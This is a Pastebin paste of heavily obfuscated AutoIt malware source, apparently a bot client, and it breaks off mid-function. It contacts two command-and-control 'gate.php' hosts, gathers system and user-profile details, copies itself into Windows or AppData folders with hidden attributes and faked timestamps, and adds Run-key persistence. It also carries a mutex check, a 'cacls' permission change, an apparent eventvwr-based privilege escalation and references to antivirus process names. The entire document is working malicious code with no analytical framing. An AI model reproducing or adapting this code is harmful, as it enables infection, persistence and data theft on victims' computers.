Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #NoTrayIcon
- OnAutoItExitRegister("mAYpWE_UYZiHnDz")
- ProcessSetPriority(@AutoItPID, 0)
- Global $wpqhjjzjyuehnra = 0
- Global $utbzbhfchfwaci81ut2vaxyj = ObjEvent(BinaryToString("0x4175746f49742e4572726f72"), "_MyEr" & "rF" & "unc")
- Global Const $kekmomat82cugd6sezckboynmw09zribmkpkmf7n[(2 + 0)][Int(ChrW("52"))] = [["nichol" & "aspring.x" & "yz:999" & "8", BinaryToString("0X2f676174652e706870", 1), BinaryToString(BinaryToString("0x30783339333436313636333033353336333133373636333436353330" & "3334333733393634333733363336363633343332333236363336333133313631" & "363433353633"), Int(Chr("49"))), "rk|zo|bf|dw|tf" & "|" & "it|" & "sk|vt|fj|aw|" & "ys|he" & "|yj|rt"], ["smartwa" & "ay." & "xyz:99" & "98", "/gate" & ".php", "94" & "af0" & "5617f4e0" & whmkkomlugeszcuofazuyripy_lpqlnzornvjlm() & "1ad5c", omqonkueyflthfeloopqjzyytqbxa_ussbwartdhxglxxtzqp()]]
- Global Const $8plx7hqhds07a1upabrdcdzq3rowl2oxrlxjg93 = BinaryToString("0x73" & "7668" & eesacdgfyhvfvfyofjvhn_aqdptkinsnfnavyfgmowe() & "865")
- Global Const $rsfy8xu2owgjzzpao1 = BinaryToString("0x57696e6" & jdqcjfagpdamtypfmszjphaexec() & "486f737420536572" & "76696365", Dec("1"))
- Global Const $tpc6yucicwgqkh24xw3ovlr34y5ylijinmmbbx50npj0ac = ((1427 + -261527) / (-17 * 17))
- Global Const $womb2ylp34fytistq70uddma0qzirctg9qv = wmewblbbsdpyhbwabpdeokiiaczmwc_ffi()
- Global Const $6aqyz9pqwl9nfa = False
- Global Const $hvviivj1dh7vcsmn0pvv6s = "1.1" & "." & "0"
- Global Const $srqtxvmgtidcu2rvvjoas5esdrgjfmwel[14] = [0, ztqerabqikbldjzkht(), @ComputerName, atakiewionljgsuuxfxvrsnvsubjfjvoufparlmlcfw(), rbialzlemyv(), kpknyihasguuzcnpgh_ygtofoavhpciukxvxur(), cclkruvvit(), fxtypszalak_wovzpqvk_cabbwockiwvnhphgyloeyit(), gkwmmakclfebkghimfpthtxvuerfwzzsitggjuxm_g_vwtl(), pseqreglybhqq(), ibvdmowumouqexuaqhujgyxbndf(), kmhvbrvryeyqedovmbdbsbkilgmkcukdmmvk(), xnzijqdtgsqsvfznaqmcqxomjylhi(), $hvviivj1dh7vcsmn0pvv6s]
- Global $zlbr6bdl1mpx5nytfs1owp086kb3oqnutrgd
- If NOT @Compiled Then Exit
- xgtmdyqpzrxaz(((4415212500000 / (-1761396 - (((-135 * -7) + (1592 + 599)) + 1553))) * -2))
- smxjfdavhanpom()
- If $cmdline[0] >= StringLen("F0") AND $cmdline[1] = BinaryToString(hyyskivghnxxdnyakergwecndfcdoefp()) Then FileDelete($cmdline[(((-1 - -2) - -1) + 0)])
- bokfzmjaxngdfest(@ScriptFullPath)
- _vwvaravzhqemcmjsvtcuxtztahpqgazredfwlqsmy($8plx7hqhds07a1upabrdcdzq3rowl2oxrlxjg93)
- stvqetqqbhmugrymqjlizak_yukxjp_jxbsdbc(@ScriptFullPath, $rsfy8xu2owgjzzpao1)
- bkmjbpjydgpjezru(@ScriptFullPath, $rsfy8xu2owgjzzpao1)
- mxhcfimpbgdflxo(@ScriptFullPath, $rsfy8xu2owgjzzpao1)
- $zlbr6bdl1mpx5nytfs1owp086kb3oqnutrgd = lyvfhzaqwb_dh_wdcboierjjyaftpppootafhofnma($womb2ylp34fytistq70uddma0qzirctg9qv)
- Do
- xgtmdyqpzrxaz(Dec("4C4B40", 0))
- Until mtfbsxdops()
- mnsufddmgkzoilpokytyaenadbrdvdzw()
- Func jqfjrgefxhqdfylsmemgfjelhqg()
- Local $honvo6snua8bbde
- $honvo6snua8bbde = "eventvwr.exe"
- Return $honvo6snua8bbde
- EndFunc
- Func lxtnntsewvb()
- Local $tcu7vqwfdfiupgigw83m8b = "0x2b525348"
- Return $tcu7vqwfdfiupgigw83m8b
- EndFunc
- Func _ixyqesfzzyfsjthlbixz()
- Return "33633"
- EndFunc
- Func aqsfjh_apecpsjimwcgda()
- Local $yhrbavod83nzsplrojm8enwnuqqh = DllStructCreate(BinaryToString("0X44574F52443B44574F52443B5054523B5054523B44574F52445F5054523B44574F52443B44574F52443B44574F52443B574F52443B574F5244", (0 + Dec("1", 0))))
- If @AutoItX64 AND @OSArch <> fdql_kfsdmdbvrs() Then
- DllCall("kernel32.dll", "none", "GetNativeSystemInfo", "struct*", DllStructGetPtr($yhrbavod83nzsplrojm8enwnuqqh))
- Else
- DllCall("kernel32.dll", "none", "GetSystemInfo", "struct*", DllStructGetPtr($yhrbavod83nzsplrojm8enwnuqqh))
- EndIf
- If @error Then Return StringLen("c")
- Return DllStructGetData($yhrbavod83nzsplrojm8enwnuqqh, 6)
- EndFunc
- Func boicqeamfinxvozzoxvvinokabyijaerbanxpf_ugy_efwtstz()
- Return yztyxziqfquxjsxbnazibqiuotbyngsynzahzw()
- EndFunc
- Func zvlcwssldmugasag_vacflokicnkit()
- Local $1bpf5gndfewor = odbwdthckanzhiurcsgerwf()
- Return $1bpf5gndfewor
- EndFunc
- Func fyhtcqknnvyqupj_cgxhowajmf()
- Local $olhoqhtgifpvtftbvzpoxoikgeonqy7yxsukc4yqeddyvb = "0X3A5222"
- Return $olhoqhtgifpvtftbvzpoxoikgeonqy7yxsukc4yqeddyvb
- EndFunc
- Func samxpookfiehurh()
- Return mefxpfswzswtjltataaxpbri()
- EndFunc
- Func tsaooquzydscefmkymbbhvkddbudtc_ijerzp()
- Return "SizeOfImage"
- EndFunc
- Func quwr_cuqmepkglf()
- Return gmofpv_lujjeuwieyzud()
- EndFunc
- Func cnjjtpqkz_camfbid()
- Local $kfurjyt8ocftisotiywhw = wgszriylkcmzjmssqabzox()
- Return $kfurjyt8ocftisotiywhw
- EndFunc
- Func slahotvinldyeippqggxgqslytgxrmokfmby()
- Return "byte["
- EndFunc
- Func zxgmerfrsgboyotstop_ixnjnzoraurlhnccbizvn()
- Return "byte Data["
- EndFunc
- Func jipksvyahlfvkhfdfxisspeevqxxixdklwgshutbvuxff()
- Local $qxr594rqlm1ncmgfz2eop3goroju4uj6z6ufzww = foiswliiodpbwmwok()
- Return $qxr594rqlm1ncmgfz2eop3goroju4uj6z6ufzww
- EndFunc
- Func aansg_xxrufwsrqikjgpwhsrjlejs()
- Return "&"
- EndFunc
- Func lyvfhzaqwb_dh_wdcboierjjyaftpppootafhofnma($zcdawgatemcpqdmbhdj3y8lwchl1gbftwvpiildwbkic)
- $zcdawgatemcpqdmbhdj3y8lwchl1gbftwvpiildwbkic = StringReplace($zcdawgatemcpqdmbhdj3y8lwchl1gbftwvpiildwbkic, BinaryToString(BinaryToString("0X30583563")), "")
- Local $d7i9ogayra4np5rcdu97iup1vgfm1gmjvmglmyf9p8lp = DllCall("kernel32.dll", "int", "CreateMutex", "int", 0, "long", ((0 + (((0 + 1) + 0) + -2)) / (-1 + 0)), "str", $zcdawgatemcpqdmbhdj3y8lwchl1gbftwvpiildwbkic)
- Local $dzyi0zuzvyposjczbxttnasznqfmqiuxm = DllCall("kernel32.dll", "int", "GetLastError")
- If $dzyi0zuzvyposjczbxttnasznqfmqiuxm[0] = Dec("B7") Then Exit
- Return $d7i9ogayra4np5rcdu97iup1vgfm1gmjvmglmyf9p8lp[0]
- EndFunc
- Func jepxrkcfuyrxzfsmmbnhng()
- Local $jkwj3sxl5l0tx1nucpbirr0mgn2lug8xwasktxi9gyirabg
- $jkwj3sxl5l0tx1nucpbirr0mgn2lug8xwasktxi9gyirabg = "0x53697A654F6648656164657273"
- Return $jkwj3sxl5l0tx1nucpbirr0mgn2lug8xwasktxi9gyirabg
- EndFunc
- Func xsnldvsghfqrnaziwurph_rwvjbmrdkhohwwnyzcrq()
- Return "defwat"
- EndFunc
- Func ekvcpbkylj()
- Local $vawm6hq1l6qzduagaxquk67h6psshxttxehgn9 = '" /' & "E /C /" & "G " & '"'
- Return $vawm6hq1l6qzduagaxquk67h6psshxttxehgn9
- EndFunc
- Func mzecyhabmcizyfxvlourcffcdcbruycdwb($soexktxsq4k58q3jnd56lweggc, $wwxrvjeuw7p0sflhsnlscp5efczla8nefi1pegb = 32771)
- Local $gtbvjnnyg8 = BinaryLen($soexktxsq4k58q3jnd56lweggc), $cqpuggiybplbcg7eapw6eoplw3gke, $8w7swnbsarf7bljuvm3lscae, $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk, $l0ogdusw5sah0 = "", $wjonlnc7bigjesqvw0cisdn8lx2ipgc1papivy0gchxyclwz6f = 0, $jnfv31wlaixdwkstuddxa = DllStructCreate("by" & "te[" & $gtbvjnnyg8 + ((1 + 0) + 0) & y_evhbxtkfwgubtphrqhnlpkscrshhpuotpajmno()), $i2uq02h1nonrro7
- DllStructSetData($jnfv31wlaixdwkstuddxa, Int(ChrW("49")), $soexktxsq4k58q3jnd56lweggc)
- $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk = DllCall("advapi32.dll", "int", "CryptAcquireContext", "ptr*", 0, "ptr", 0, "ptr", 0, "dword", StringLen("d"), "dword", -268435456)
- If NOT @error AND $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk[0] Then
- $cqpuggiybplbcg7eapw6eoplw3gke = $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk[Dec("1", 0)]
- $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk = DllCall("advapi32.dll", "int", "CryptCreateHash", "ptr", $cqpuggiybplbcg7eapw6eoplw3gke, "dword", $wwxrvjeuw7p0sflhsnlscp5efczla8nefi1pegb, "ptr", 0, "dword", 0, "ptr*", 0)
- If $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk[0] Then
- $8w7swnbsarf7bljuvm3lscae = $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk[StringLen("?_Rvi")]
- $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk = DllCall("advapi32.dll", "int", "CryptHashData", "ptr", $8w7swnbsarf7bljuvm3lscae, "ptr", DllStructGetPtr($jnfv31wlaixdwkstuddxa), "dword", $gtbvjnnyg8, "dword", 0)
- If $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk[0] Then
- $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk = DllCall("advapi32.dll", "int", "CryptGetHashParam", "ptr", $8w7swnbsarf7bljuvm3lscae, "dword", ((0 + -1) * (((-1 / 1) + 0) + (0 - 1))), "ptr", 0, "int*", 0, "dword", 0)
- $i2uq02h1nonrro7 = DllStructCreate("byt" & "e" & "[" & $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk[4] & BinaryToString("0x" & "5d", 1))
- DllCall("advapi32.dll", "int", "CryptGetHashParam", "ptr", $8w7swnbsarf7bljuvm3lscae, "dword", Int(ChrW("50")), "ptr", DllStructGetPtr($i2uq02h1nonrro7), "int*", $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk[4], "dword", 0)
- $l0ogdusw5sah0 = Hex(DllStructGetData($i2uq02h1nonrro7, (-1 - (0 + -2))))
- Else
- $wjonlnc7bigjesqvw0cisdn8lx2ipgc1papivy0gchxyclwz6f = Int(Chr("51"))
- EndIf
- DllCall("advapi32.dll", "int", "CryptDestroyHash", "ptr", $8w7swnbsarf7bljuvm3lscae)
- Else
- $wjonlnc7bigjesqvw0cisdn8lx2ipgc1papivy0gchxyclwz6f = 2
- EndIf
- DllCall("advapi32.dll", "int", "CryptReleaseContext", "ptr", $cqpuggiybplbcg7eapw6eoplw3gke, "dword", 0)
- Else
- $wjonlnc7bigjesqvw0cisdn8lx2ipgc1papivy0gchxyclwz6f = Dec("1")
- EndIf
- Return SetError($wjonlnc7bigjesqvw0cisdn8lx2ipgc1papivy0gchxyclwz6f, 0, StringLower($l0ogdusw5sah0))
- EndFunc
- Func fpwymajqzzqkowvzlqaajtd_akcwqyoephhdlxd()
- Local $eidh2bcahn3fqoggohfjxueo8qgkwmpnu82h67vyqvnyuaw = "0X202F6320"
- Return $eidh2bcahn3fqoggohfjxueo8qgkwmpnu82h67vyqvnyuaw
- EndFunc
- Func bnweiuxlxsjblshrwjzhneajmjkknlnknn_iknrxxjppfztqgo()
- Local $rkvhv8lognumziod1chgphyejenolgmwnsaniwvk6muljn = "]"
- Return $rkvhv8lognumziod1chgphyejenolgmwnsaniwvk6muljn
- EndFunc
- Func wmewblbbsdpyhbwabpdeokiiaczmwc_ffi()
- Return "90" & "0"
- EndFunc
- Func dqxfslpnbuemcrgxagplmoyd_dqqnegeeznsydhb()
- Local $6hl7josirljripuuluufpc6yttyoeij = ".lnk"
- Return $6hl7josirljripuuluufpc6yttyoeij
- EndFunc
- Func cgyaodzdyfzpzytflyedsdstcmvgxetfciaszc()
- Local $brzuvkvpy5nhun00vu0kpe27ucevr5kbtz8htozytkooufjs0
- $brzuvkvpy5nhun00vu0kpe27ucevr5kbtz8htozytkooufjs0 = "0x307836343737366637323634323034333666366537343635373837343436366336313637373333623634373736663732363432303434373233303362323036343737366637323634323034343732333133623230363437373666373236343230343437323332336232303634373736663732363432303434373233333362323036343737366637323634323034343732333633623230363437373666373236343230343437323337336236343737366637323634323034333666366537343732366636633537366637323634336232303634373736663732363432303533373436313734373537333537366637323634336232303634373736663732363432303534363136373537366637323634336232303634373736663732363432303435373237323666373234663636363637333635373433623230363437373666373236343230343537323732366637323533363536633635363337343666373233623230363437373666373236343230343436313734363134663636363637333635373433623230363437373666373236343230343436313734363135333635366336353633373436663732336232303632373937343635323035323635363736393733373436353732343137323635363135623338333035643362323036343737366637323634323034333732333034653730373835333734363137343635336236343737366637323634323035333635363734373733336232303634373736663732363432303533363536373436373333623230363437373666373236343230353336353637343537333362323036343737366637323634323035333635363734343733336236343737366637323634323034353634363933623230363437373666373236343230343537333639336232303634373736663732363432303435363237383362323036343737366637323634323034353634373833623230363437373666373236343230343536333738336232303634373736663732363432303435363137383362363437373666373236343230343536323730336232303634373736663732363432303435363937303362323036343737366637323634323035333635363734333733336232303634373736663732363432303435343636633631363737333362323036343737366637323634323034353733373033623230363437373666373236343230353336353637353337333362363237393734363532303435373837343635366536343635363435323635363736393733373436353732373335623335333133323564"
- Return $brzuvkvpy5nhun00vu0kpe27ucevr5kbtz8htozytkooufjs0
- EndFunc
- Func hpqrzftlekykdcvohfanyagilwgvisvgou_()
- Local $vj7d5yx3lq7gx40oef
- $vj7d5yx3lq7gx40oef = "fsav32.exe"
- Return $vj7d5yx3lq7gx40oef
- EndFunc
- Func gpogoodvlz()
- Return BinaryToString("0x5D", 1)
- EndFunc
- Func kjavlascotfsjjcnqepcvvftdcdqrkxyofgnmgnwmtobtwifw()
- Return boicqeamfinxvozzoxvvinokabyijaerbanxpf_ugy_efwtstz()
- EndFunc
- Func tjsutkilvvikvlhprwl()
- Return konyqusqkq_qcty_hkpqnpqbzfvzlcxze_nwm()
- EndFunc
- Func abftocaowtobwfyqzbnomwsfiunz()
- Return fwhnpcoougjxlddfjoznzqtqlbwctprdsdvaud()
- EndFunc
- Func flflhsblpdpjipxofuh()
- Local $eyphskobecjzkmdpmokq1iv5crvpobetergk = '","'
- Return $eyphskobecjzkmdpmokq1iv5crvpobetergk
- EndFunc
- Func atakiewionljgsuuxfxvrsnvsubjfjvoufparlmlcfw()
- Local $zaptcggm8sugcuw, $mxrhtao7u7zjm031gszztzdzigflcdd4nxv0govhrd, $hprt2m0tvbtomv5vskkwnvv, $fz3eclo13c4hpsztvduuwn10gcs
- While StringLen("j")
- $fz3eclo13c4hpsztvduuwn10gcs += (1 + 0)
- If @OSArch = jdzczmqtjmzmqepmsmkrdmxzrboakzth() OR @OSArch = BinaryToString(ks_tmbbcohmnojwvgvjjpboikjrqqlwoiuhfpmhibhkuupai(), 1) Then
- $zaptcggm8sugcuw = RegEnumKey("HKEY_LOCAL_MACHINE64\SOFTWARE\Micro" & "soft\Windows N" & "T\CurrentVersion\ProfileList", $fz3eclo13c4hpsztvduuwn10gcs)
- Else
- $zaptcggm8sugcuw = RegEnumKey(raeay_odizwtovx(), $fz3eclo13c4hpsztvduuwn10gcs)
- EndIf
- If @error Then ExitLoop
- If StringInStr($zaptcggm8sugcuw, gsvrgilpirrqddrbznmaewwoxdhudqe() & "5" & "-" & "21") > 0 Then
- If @OSArch = BinaryToString(BinaryToString("0X3058353833363334", (1 + 0)), Dec("1", 0)) OR @OSArch = jipksvyahlfvkhfdfxisspeevqxxixdklwgshutbvuxff() Then
- $mxrhtao7u7zjm031gszztzdzigflcdd4nxv0govhrd = RegRead(utwzvlwnpjfcyysqnef_fajgswzbofkjhedzao_v() & $zaptcggm8sugcuw, zzhrcnq_fwbaelobsmnjjpovbirfjknocxl_kumlscerrsgyg())
- Else
- $mxrhtao7u7zjm031gszztzdzigflcdd4nxv0govhrd = RegRead(BinaryToString(BinaryToString(sbenvtjps_llhlvtw()), 1) & $zaptcggm8sugcuw, BinaryToString(oluukgoeqwzedazpkiqudrgarqvbeoseuaybfuyf(), (((Int(ChrW("49")) - 2) / 1) / -1)))
- EndIf
- $mxrhtao7u7zjm031gszztzdzigflcdd4nxv0govhrd = StringSplit($mxrhtao7u7zjm031gszztzdzigflcdd4nxv0govhrd, "\")
- $hprt2m0tvbtomv5vskkwnvv &= $mxrhtao7u7zjm031gszztzdzigflcdd4nxv0govhrd[$mxrhtao7u7zjm031gszztzdzigflcdd4nxv0govhrd[0]] & '"' & ',"'
- EndIf
- WEnd
- Return yudegdcvnivlxsfkrhgsdpuctiguwhzeyxyovq_iz() & StringLeft($hprt2m0tvbtomv5vskkwnvv, StringLen($hprt2m0tvbtomv5vskkwnvv) - StringLen("iC")) & bnweiuxlxsjblshrwjzhneajmjkknlnknn_iknrxxjppfztqgo()
- EndFunc
- Func lhkdyhqgsnwgdzpdzsztrsglapgjcayfbpoe()
- Local $yss6xhyd7m06kgiumtnoiikijp0i14ik
- $yss6xhyd7m06kgiumtnoiikijp0i14ik = BinaryToString("0x5c536f6674776172655c4d6963726f736f66745c57696e646f77735c43757272656e7456657273696f6e5c52756e5c", 1)
- Return $yss6xhyd7m06kgiumtnoiikijp0i14ik
- EndFunc
- Func enrmlznxprgqt()
- Return "HKEY_LOCAL_MACHINE"
- EndFunc
- Func rshhjjzjoqnrfvikbddmfoeyxfjzcbpobhgorsqhrv()
- Return BinaryToString("0x202F46")
- EndFunc
- Func dyciwwrjojzbrsppftmchong_a()
- Local $l0x1rtq0bs2hsp7lavofh0c5jasjc5ee7hzsbm0mzgix9lc9ug
- $l0x1rtq0bs2hsp7lavofh0c5jasjc5ee7hzsbm0mzgix9lc9ug = BinaryToString("0x202f63206563686f20797c206361636c732e6578652022", 1)
- Return $l0x1rtq0bs2hsp7lavofh0c5jasjc5ee7hzsbm0mzgix9lc9ug
- EndFunc
- Func cpttzgulsesxriwhs()
- Return "WI" & "N" & "_XP"
- EndFunc
- Func _vwvaravzhqemcmjsvtcuxtztahpqgazredfwlqsmy($n4c3hqn4eib0zrsardsumi3)
- If IsAdmin() = True Then
- If @ScriptFullPath <> @WindowsDir & jkq_orgovsecuydujwgdz_bsqb() & $n4c3hqn4eib0zrsardsumi3 Then
- If FileExists(@WindowsDir & ylpsnxwwmqxf() & $n4c3hqn4eib0zrsardsumi3) Then
- kfryfuuq_aeiqzqc(@WindowsDir & bnlpzkechhfyauotjnrrclakycijdkbjoa_() & $n4c3hqn4eib0zrsardsumi3, False)
- FileSetAttrib(@WindowsDir & "\" & $n4c3hqn4eib0zrsardsumi3, BinaryToString("0x2D525348"))
- EndIf
- FileCopy(@ScriptFullPath, @WindowsDir & BinaryToString(BinaryToString("0x30783543")) & $n4c3hqn4eib0zrsardsumi3, StringLen("9"))
- bokfzmjaxngdfest(@WindowsDir & "\" & $n4c3hqn4eib0zrsardsumi3)
- FileSetAttrib(@WindowsDir & "\" & $n4c3hqn4eib0zrsardsumi3, BinaryToString(BinaryToString("0x30583262353235333438")))
- FileSetTime(@WindowsDir & "\" & $n4c3hqn4eib0zrsardsumi3, Random((((1109354 + (958209 + -3718234)) - -4748671) / 1549), ((((21 + 11) + -248) - (-217764 / (-212 + (-82 + 708)))) + ((190 - 443) + (980 * (-1 - -3)))), Int(Chr("49"))) & Random(((((-5 * StringLen("JzxxPB")) / 3) + (9 - Dec("13", 0))) / (0 - Dec("2"))), ((15 + ((266765400 / ((-20738440 * (1 + 2)) / ((-1745 + ((-5550 / 50) * 3)) * ((Dec("1") + (1 * (-4 / 2))) - 1)))) / 132)) / (((Int(ChrW("52")) / -1) / (Dec("2") - 0)) * 5)), 1) & Random(Dec("a", 0), ((6 - 17) + (-13 * -3)), (1 - 0)), StringLen("s"))
- kfryfuuq_aeiqzqc(@WindowsDir & "\" & $n4c3hqn4eib0zrsardsumi3)
- Run(zvlcwssldmugasag_vacflokicnkit() & @WindowsDir & "\" & $n4c3hqn4eib0zrsardsumi3 & BinaryToString("0x22202d642022", Int(ChrW("49"))) & @ScriptFullPath & BinaryToString(buvlnkhyhokev()))
- Exit
- EndIf
- Else
- If @ScriptFullPath <> @AppDataDir & tqndkbjzndxcqlnotvrehifjxuszgwhmzu() & $n4c3hqn4eib0zrsardsumi3 Then
- If FileExists(@AppDataDir & BinaryToString("0X5C") & $n4c3hqn4eib0zrsardsumi3) Then
- kfryfuuq_aeiqzqc(@AppDataDir & BinaryToString("0" & "x" & "5c") & $n4c3hqn4eib0zrsardsumi3, False)
- FileSetAttrib(@AppDataDir & BinaryToString(rwhsslzitoetfswiuloifcmzvndt_alg()) & $n4c3hqn4eib0zrsardsumi3, iilyuxbwugiyndbi_snmefwtscqk_sxeccoijdjxbjbwevq())
- EndIf
- FileCopy(@ScriptFullPath, @AppDataDir & BinaryToString("0x" & "5C", Dec("1")) & $n4c3hqn4eib0zrsardsumi3, (0 - ((0 + -1) + 0)))
- bokfzmjaxngdfest(@AppDataDir & "\" & $n4c3hqn4eib0zrsardsumi3)
- FileSetAttrib(@AppDataDir & "\" & $n4c3hqn4eib0zrsardsumi3, BinaryToString(lxtnntsewvb()))
- FileSetTime(@AppDataDir & etucwzrejgsaohyyngwcqpwbexyypvwcdvosoker() & $n4c3hqn4eib0zrsardsumi3, Random(2000, 2017, StringLen("w")) & Random(((((((0 - (Int(ChrW(49)) - 2)) + (1 - (-3 + Dec("7")))) + -7) / (3 - 0)) - ((((1 + 0) * -2) + 0) + (Int(ChrW(56)) / Dec("2")))) * -2), (StringLen("xA") + (((((-829472 * 4) / 1472) / (StringLen("BRct7!kMrEYw_RLxnxqNdNmdbjkU608dhx-L") - -10)) / Dec("7", 0)) - ((StringLen("S4Q") + (-4 + ((Dec("1") * Dec("2", 0)) + -15))) - Dec("3", 0)))), (0 - (-1 - 0))) & Random((90 / (StringLen("VTGBMjp9H") - 0)), ((182 / -13) * ((1 / -1) + (-1 / ((1 + -2) / ((-1 - 0) + 0))))), Dec("1")), StringLen("k"))
- kfryfuuq_aeiqzqc(@AppDataDir & "\" & $n4c3hqn4eib0zrsardsumi3)
- Run(rjobxxqrxdzlojrxrihhc_pwshhkcmgell_ilhndg() & @AppDataDir & ktlqhfvxfwwmyfcvkonutgvlgpzijyjjvkk() & $n4c3hqn4eib0zrsardsumi3 & '" -' & 'd "' & @ScriptFullPath & abftocaowtobwfyqzbnomwsfiunz())
- Exit
- EndIf
- EndIf
- EndFunc
- Func rjwmrhlmatm_kqymunbmcrtqlxi()
- Return "0x7274767363616e2e657865"
- EndFunc
- Func cclkruvvit()
- Local $ungpqurvv2cnbvpineaqfzpxespfsqlzljp4 = MemGetStats()
- Return $ungpqurvv2cnbvpineaqfzpxespfsqlzljp4[(1 - 0)]
- EndFunc
- Func feaeizqavjgibpxnqxqn_ltkbmg()
- Local $irrvhrninzwkoreqfwkkplm4ohvveczrdiane13 = "0x436973747261792E657865"
- Return $irrvhrninzwkoreqfwkkplm4ohvveczrdiane13
- EndFunc
- Func reffgukbceidox()
- Local $adlpfg4xk8drajvt3 = "HK" & "EY_CURRENT_USE" & "R\Soft" & "ware\Microsoft\Windows\" & "CurrentVersion\R" & "un\"
- Return $adlpfg4xk8drajvt3
- EndFunc
- Func ppexiuwxlsnolyxvz()
- Local $akhbmw7loh6gdlnxtrykxkyrc
- $akhbmw7loh6gdlnxtrykxkyrc = "vsstat.exe"
- Return $akhbmw7loh6gdlnxtrykxkyrc
- EndFunc
- Func hyyskivghnxxdnyakergwecndfcdoefp()
- Return mnwumtdbranfjd()
- EndFunc
- Func sctrlw_uspabvkwcwrpunedkkotxwp_mmjamcirofjdjbuv()
- Return "byte["
- EndFunc
- Func fdql_kfsdmdbvrs()
- Local $6fgemckyjnxzxvgbvi9puxfkgvaxsojfdh7tsexrovcudsh9
- $6fgemckyjnxzxvgbvi9puxfkgvaxsojfdh7tsexrovcudsh9 = BinaryToString("0X583836")
- Return $6fgemckyjnxzxvgbvi9puxfkgvaxsojfdh7tsexrovcudsh9
- EndFunc
- Func glgmpfzsipekhiwmtavlmgypd()
- Local $9ewwnon9poxf4wwh1hxz53fe
- $9ewwnon9poxf4wwh1hxz53fe = riglxmjnhpwm()
- Return $9ewwnon9poxf4wwh1hxz53fe
- EndFunc
- Func ugwrxlngxiz()
- Return ".exe"
- EndFunc
- Func fcylnepcxv_uzhufwnkljroccpcnsunjaluok()
- Local $bsi9sgoqwx4z97j
- $bsi9sgoqwx4z97j = nucbldtpuxmuekkoagchsndjpmwwupsxilqvhsp_dwpoeuhpmb()
- Return $bsi9sgoqwx4z97j
- EndFunc
- Func jtwsvuynftmtffnqaf_yhukqcdwlzjbfochbvgbtyinf()
- Return "0x532D312D352D33322D353435"
- EndFunc
- Func cjufzzbfcyuqponrezanouwiifqalgkrbijsp()
- Return ':R"'
- EndFunc
- Func _olhkzgdboqxizulifnlxhawi()
- If NOT IsObj($utbzbhfchfwaci81ut2vaxyj) Then Return False
- Local $dzyi0zuzvyposjczbxttnasznqfmqiuxm = Hex($utbzbhfchfwaci81ut2vaxyj.number, ((7 + -15) + (Int(Chr("49")) - -15)))
- If $dzyi0zuzvyposjczbxttnasznqfmqiuxm = 0 Then $dzyi0zuzvyposjczbxttnasznqfmqiuxm = -Int(Chr("49"))
- $wpqhjjzjyuehnra = $dzyi0zuzvyposjczbxttnasznqfmqiuxm
- EndFunc
- Func rbialzlemyv()
- Local $yhrbavod83nzsplrojm8enwnuqqh = DllStructCreate("DWORD;DWORD;DWOR" & BinaryToString("0X443b44574f52443b44574f") & "R" & "D;WC" & "HAR[128" & "];WORD;" & "WORD;WORD;BYTE;BYTE")
- DllStructSetData($yhrbavod83nzsplrojm8enwnuqqh, ((0 - ((-1 - 0) / (0 + -1))) - ((1 + -2) + (-1 / 1))), DllStructGetSize($yhrbavod83nzsplrojm8enwnuqqh))
- DllCall("ntdll.dll", "int", "RtlGetVersion", "ptr", DllStructGetPtr($yhrbavod83nzsplrojm8enwnuqqh))
- If @error Then Return SetError(Dec("1"), @error, "Error calling RtlGetVersion")
- Local $9yresluprghddgwblrac4rrxdajmxzcuyiu = DllCall("User32.dll", "int", "GetSystemMetrics", "int", 89)
- If @error Then Return SetError((-1 + (Dec("9") / 3)), @error, "Error calling GetSystemMetrics")
- Local $0anfbfiacxx = "[" & '"' & DllStructGetData($yhrbavod83nzsplrojm8enwnuqqh, (1 * Dec("2", 0)))
- $0anfbfiacxx &= flflhsblpdpjipxofuh() & DllStructGetData($yhrbavod83nzsplrojm8enwnuqqh, 3)
- $0anfbfiacxx &= '"' & ',"' & DllStructGetData($yhrbavod83nzsplrojm8enwnuqqh, (Dec("1", 0) * (-3 + 7)))
- $0anfbfiacxx &= '"' & ',"' & DllStructGetData($yhrbavod83nzsplrojm8enwnuqqh, (StringLen("0mCPQgaY6k!B") / 2))
- $0anfbfiacxx &= BinaryToString("0x222c22", StringLen("?")) & DllStructGetData($yhrbavod83nzsplrojm8enwnuqqh, (5 + Dec("4", 0)))
- $0anfbfiacxx &= qngvvwowsbiinfao_aanc_axaxtoqv_sfmnohc() & DllStructGetData($yhrbavod83nzsplrojm8enwnuqqh, 10)
- $0anfbfiacxx &= '"' & ',"' & $9yresluprghddgwblrac4rrxdajmxzcuyiu[0]
- $0anfbfiacxx &= BinaryToString("0X225D", ((1 + -2) / (0 - StringLen("n"))))
- Return $0anfbfiacxx
- EndFunc
- Func jxiwwibqksiitsmcweyfjpqnepklabadschr()
- Local $sxwlnm9xofdlv7nqbbupr0bw40eljqdayzcmmdvowwu = "avkproxy.exe"
- Return $sxwlnm9xofdlv7nqbbupr0bw40eljqdayzcmmdvowwu
- EndFunc
- Func bgxyyfcmeuf()
- Return pkwphzoqwgrbylibjpvsujhsugxdiulmruppgoaeimwfdnjidy()
- EndFunc
- Func oluukgoeqwzedazpkiqudrgarqvbeoseuaybfuyf()
- Return "0X50726f66696c65496d61676550617468"
- EndFunc
- Func oz_xgvhffmrfbaoqtcyzzbhpehbysxguyrniouhmu($mpodnfy6il, $mwyrp6radfbjj2o18qu7lf5szz25ruvmuvpku, $uz6xcfbbq64sbwfiawi7sfvszlxpizffz2xtqul)
